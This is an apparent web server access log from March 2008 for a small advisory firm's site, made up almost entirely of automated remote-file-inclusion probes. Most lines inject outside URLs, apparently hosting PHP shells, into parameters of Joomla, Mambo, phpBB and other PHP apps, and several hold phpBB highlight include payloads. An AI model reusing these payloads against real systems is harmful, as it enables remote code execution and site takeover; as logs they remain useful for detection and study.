212.85.12.121 - - [31/Mar/2008:19:59:13 -0700] "GET /logs/addons/separate-comments-mod/my-comments-display-tpl.php?language_file=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.bsfadvisors.com"
212.85.12.121 - - [31/Mar/2008:19:59:18 -0700] "GET /addons/separate-comments-mod/my-comments-display-tpl.php?language_file=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.bsfadvisors.com"
205.234.213.67 - - [31/Mar/2008:20:02:30 -0700] "GET /logs/access.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
205.234.213.67 - - [31/Mar/2008:20:02:30 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
200.101.193.183 - - [31/Mar/2008:20:04:59 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://heidik.org/canar/cmdaff? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:20:07:58 -0700] "GET //OFW_Blog//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.thepeterboroughportal.co.uk/auction/logo/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
194.153.113.7 - - [31/Mar/2008:20:10:50 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; obot)" "www.bsfadvisors.com"
194.153.113.7 - - [31/Mar/2008:20:10:50 -0700] "GET /index.html HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; obot)" "www.bsfadvisors.com"
194.153.113.7 - - [31/Mar/2008:20:10:50 -0700] "GET / HTTP/1.1" 200 1180 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; obot)" "www.bsfadvisors.com"
194.153.113.7 - - [31/Mar/2008:20:10:51 -0700] "GET /services.html HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; obot)" "www.bsfadvisors.com"
194.153.113.7 - - [31/Mar/2008:20:10:52 -0700] "GET /overview.html HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; obot)" "www.bsfadvisors.com"
194.153.113.7 - - [31/Mar/2008:20:10:52 -0700] "GET /contact.html HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; obot)" "www.bsfadvisors.com"
194.153.113.7 - - [31/Mar/2008:20:10:53 -0700] "GET /resources.html HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; obot)" "www.bsfadvisors.com"
194.153.113.7 - - [31/Mar/2008:20:10:53 -0700] "GET /bsf_style.css HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0; obot)" "www.bsfadvisors.com"
207.44.244.77 - - [31/Mar/2008:20:11:47 -0700] "GET /componentscom_galleriagalleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [31/Mar/2008:20:12:42 -0700] "GET /logs/access.log/componentscom_galleriagalleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [31/Mar/2008:20:12:43 -0700] "GET /logs/access.log/componentscom_galleriagalleria.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [31/Mar/2008:20:12:43 -0700] "GET /logs/componentscom_galleriagalleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [31/Mar/2008:20:12:44 -0700] "GET /logs/componentscom_galleriagalleria.html.php?mosConfig_absolute_path=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
189.19.255.240 - - [31/Mar/2008:20:14:38 -0700] "GET /logs/access.log/arg.php?arg=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
189.19.255.240 - - [31/Mar/2008:20:14:44 -0700] "GET /arg.php?arg=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
189.19.255.240 - - [31/Mar/2008:20:14:44 -0700] "GET /logs/arg.php?arg=CMD? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
211.233.63.186 - - [31/Mar/2008:20:14:46 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
211.233.63.186 - - [31/Mar/2008:20:14:55 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
211.233.63.186 - - [31/Mar/2008:20:15:04 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
207.44.244.77 - - [31/Mar/2008:20:15:18 -0700] "GET /logs/access.log/administratorcomponentscom_a6mambocreditsadmin.a6mambocredits.php?mosConfig_live_site=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.244.77 - - [31/Mar/2008:20:15:19 -0700] "GET /logs/administratorcomponentscom_a6mambocreditsadmin.a6mambocredits.php?mosConfig_live_site=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
72.29.81.233 - - [31/Mar/2008:20:20:35 -0700] "GET /logs/access.log/index.php?theme=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.81.233 - - [31/Mar/2008:20:20:35 -0700] "GET /index.php?theme=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.81.233 - - [31/Mar/2008:20:20:35 -0700] "GET /logs/index.php?theme=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.91.249.193 - - [31/Mar/2008:20:20:52 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.91.249.193 - - [31/Mar/2008:20:20:52 -0700] "GET //config/dbutil.bck.php?confdir=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.91.249.193 - - [31/Mar/2008:20:20:52 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
211.233.63.186 - - [31/Mar/2008:20:21:30 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
211.233.63.186 - - [31/Mar/2008:20:21:39 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
211.233.63.186 - - [31/Mar/2008:20:21:47 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.aims.unc.edu/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.bsfadvisors.com"
212.85.12.121 - - [31/Mar/2008:20:21:54 -0700] "GET /logs/access.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.s-e-l-f.de/contenido/external/frontend/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
212.85.12.121 - - [31/Mar/2008:20:21:54 -0700] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.s-e-l-f.de/contenido/external/frontend/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
212.85.12.121 - - [31/Mar/2008:20:21:55 -0700] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.s-e-l-f.de/contenido/external/frontend/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
212.85.12.121 - - [31/Mar/2008:20:22:03 -0700] "GET /logs/access.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.s-e-l-f.de/contenido/external/frontend/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
212.85.12.121 - - [31/Mar/2008:20:22:03 -0700] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.s-e-l-f.de/contenido/external/frontend/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
212.85.12.121 - - [31/Mar/2008:20:22:03 -0700] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.s-e-l-f.de/contenido/external/frontend/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
212.85.12.121 - - [31/Mar/2008:20:24:02 -0700] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
65.91.249.193 - - [31/Mar/2008:20:24:51 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.91.249.193 - - [31/Mar/2008:20:24:51 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.91.249.193 - - [31/Mar/2008:20:24:51 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
212.85.12.121 - - [31/Mar/2008:20:26:03 -0700] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
212.85.12.121 - - [31/Mar/2008:20:26:05 -0700] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
202.59.22.92 - - [31/Mar/2008:20:27:53 -0700] "GET /logs/access.log/index.php?sourcedir=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.bsfadvisors.com"
202.59.22.92 - - [31/Mar/2008:20:27:53 -0700] "GET /index.php?sourcedir=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.bsfadvisors.com"
202.59.22.92 - - [31/Mar/2008:20:27:54 -0700] "GET /logs/index.php?sourcedir=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.bsfadvisors.com"
202.142.220.42 - - [31/Mar/2008:20:28:21 -0700] "GET /logs/index.php?body=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
202.142.220.42 - - [31/Mar/2008:20:28:21 -0700] "GET /index.php?body=http://www.geocities.com/vie.tian/albania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
72.29.82.80 - - [31/Mar/2008:20:31:43 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.82.80 - - [31/Mar/2008:20:31:43 -0700] "GET //skin/zero_vote/error.php?dir=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.82.80 - - [31/Mar/2008:20:31:43 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
69.94.24.226 - - [31/Mar/2008:20:32:56 -0700] "GET /txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.nameserver11.net/billing2/include/html/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.bsfadvisors.com"
69.94.24.226 - - [31/Mar/2008:20:32:57 -0700] "GET /logs/txt-db-api/txt-db-api.php?API_HOME_DIR=http://www.nameserver11.net/billing2/include/html/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.bsfadvisors.com"
218.216.120.163 - - [31/Mar/2008:20:33:43 -0700] "GET /logs/access.log/administratorcomponentscom_a6mambocreditsadmin.a6mambocredits.php?mosConfig_live_site=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [31/Mar/2008:20:33:43 -0700] "GET /logs/access.log/administratorcomponentscom_a6mambocreditsadmin.a6mambocredits.php?mosConfig_live_site=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [31/Mar/2008:20:33:44 -0700] "GET /logs/administratorcomponentscom_a6mambocreditsadmin.a6mambocredits.php?mosConfig_live_site=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.216.120.163 - - [31/Mar/2008:20:33:44 -0700] "GET /logs/administratorcomponentscom_a6mambocreditsadmin.a6mambocredits.php?mosConfig_live_site=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.244.77 - - [31/Mar/2008:20:33:51 -0700] "GET /logs/access.log/componentscom_galleriagalleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.244.77 - - [31/Mar/2008:20:33:51 -0700] "GET /logs/componentscom_galleriagalleria.html.php?mosConfig_absolute_path=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
84.18.207.64 - - [31/Mar/2008:20:34:53 -0700] "GET /logs//rwcards.advancedate.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
84.18.207.64 - - [31/Mar/2008:20:34:53 -0700] "GET //rwcards.advancedate.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
202.59.22.92 - - [31/Mar/2008:20:35:34 -0700] "GET /logs/access_071231.log/index.php?sourcedir=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.bsfadvisors.com"
212.85.12.121 - - [31/Mar/2008:20:36:07 -0700] "GET /logs/access.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
212.85.12.121 - - [31/Mar/2008:20:36:07 -0700] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
212.85.12.121 - - [31/Mar/2008:20:36:07 -0700] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
212.85.12.121 - - [31/Mar/2008:20:36:14 -0700] "GET /logs/access.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
212.85.12.121 - - [31/Mar/2008:20:36:14 -0700] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
212.85.12.121 - - [31/Mar/2008:20:36:14 -0700] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/arab.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
84.18.207.64 - - [31/Mar/2008:20:38:25 -0700] "GET /logs/access.log//?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
84.18.207.64 - - [31/Mar/2008:20:38:26 -0700] "GET //?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 200 1180 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
84.18.207.64 - - [31/Mar/2008:20:38:26 -0700] "GET /logs//?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 200 2945 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:20:41:42 -0700] "GET /logs/access.log//OFW_Blog//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.thepeterboroughportal.co.uk/auction/logo/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:20:41:44 -0700] "GET /logs//OFW_Blog//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.thepeterboroughportal.co.uk/auction/logo/IndoID?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
65.91.249.193 - - [31/Mar/2008:20:42:03 -0700] "GET /logs/access.log//skin/zero_vote/ask_password.php?dir=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.91.249.193 - - [31/Mar/2008:20:42:04 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
65.91.249.193 - - [31/Mar/2008:20:42:04 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.avedila.com/avedila/.../memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
212.85.12.121 - - [31/Mar/2008:20:44:44 -0700] "GET /logs/access.log/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
212.85.12.121 - - [31/Mar/2008:20:44:44 -0700] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
69.94.24.226 - - [31/Mar/2008:20:46:39 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.nameserver11.net/billing2/include/html/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.bsfadvisors.com"
69.94.24.226 - - [31/Mar/2008:20:46:39 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.nameserver11.net/billing2/include/html/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.bsfadvisors.com"
84.18.207.64 - - [31/Mar/2008:20:48:16 -0700] "GET /logs/access_080101.log//rwcards.advancedate.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
84.18.207.64 - - [31/Mar/2008:20:48:16 -0700] "GET //rwcards.advancedate.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
84.18.207.64 - - [31/Mar/2008:20:48:16 -0700] "GET /logs//rwcards.advancedate.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
84.18.207.64 - - [31/Mar/2008:20:49:08 -0700] "GET /logs/access.log//rwcards.advancedate.php?mosConfig_absolute_path=http://mykonos.bargaingreece.com//components/com_log/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
64.246.22.2 - - [31/Mar/2008:20:51:33 -0700] "GET /logs/access_080201.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
64.246.22.2 - - [31/Mar/2008:20:51:34 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
64.246.22.2 - - [31/Mar/2008:20:51:34 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
69.90.114.126 - - [31/Mar/2008:20:53:46 -0700] "GET /logs/access_071231.log/index.php?sourcedir=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
69.90.114.126 - - [31/Mar/2008:20:53:46 -0700] "GET /index.php?sourcedir=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
69.90.114.126 - - [31/Mar/2008:20:53:51 -0700] "GET /logs/index.php?sourcedir=http://www.buyindianproducts.com/includes/font/idracrew3.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:21:00:07 -0700] "GET /logs/index.php?body=http://www.julmy.org/genealogie/mouse.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
200.21.223.90 - - [31/Mar/2008:21:00:11 -0700] "GET /index.php?body=http://www.julmy.org/genealogie/mouse.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
207.44.244.77 - - [31/Mar/2008:21:10:38 -0700] "GET /logs/access.log/index.php?theme=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.244.77 - - [31/Mar/2008:21:10:39 -0700] "GET /index.php?theme=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
207.44.244.77 - - [31/Mar/2008:21:10:39 -0700] "GET /logs/index.php?theme=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
74.52.2.130 - - [31/Mar/2008:21:12:21 -0700] "GET /logs/access_080201.log/index.php?option=com_simpleboard&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.52.2.130 - - [31/Mar/2008:21:12:21 -0700] "GET /index.php?option=com_simpleboard&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.52.2.130 - - [31/Mar/2008:21:12:21 -0700] "GET /logs/index.php?option=com_simpleboard&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
74.52.2.130 - - [31/Mar/2008:21:14:34 -0700] "GET /logs/access.log/index.php?option=com_simpleboard&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [31/Mar/2008:21:16:17 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [31/Mar/2008:21:16:17 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [31/Mar/2008:21:16:17 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.hddshare.com/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.246.77.203 - - [31/Mar/2008:21:16:17 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.doughmainz.com/besttlds/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
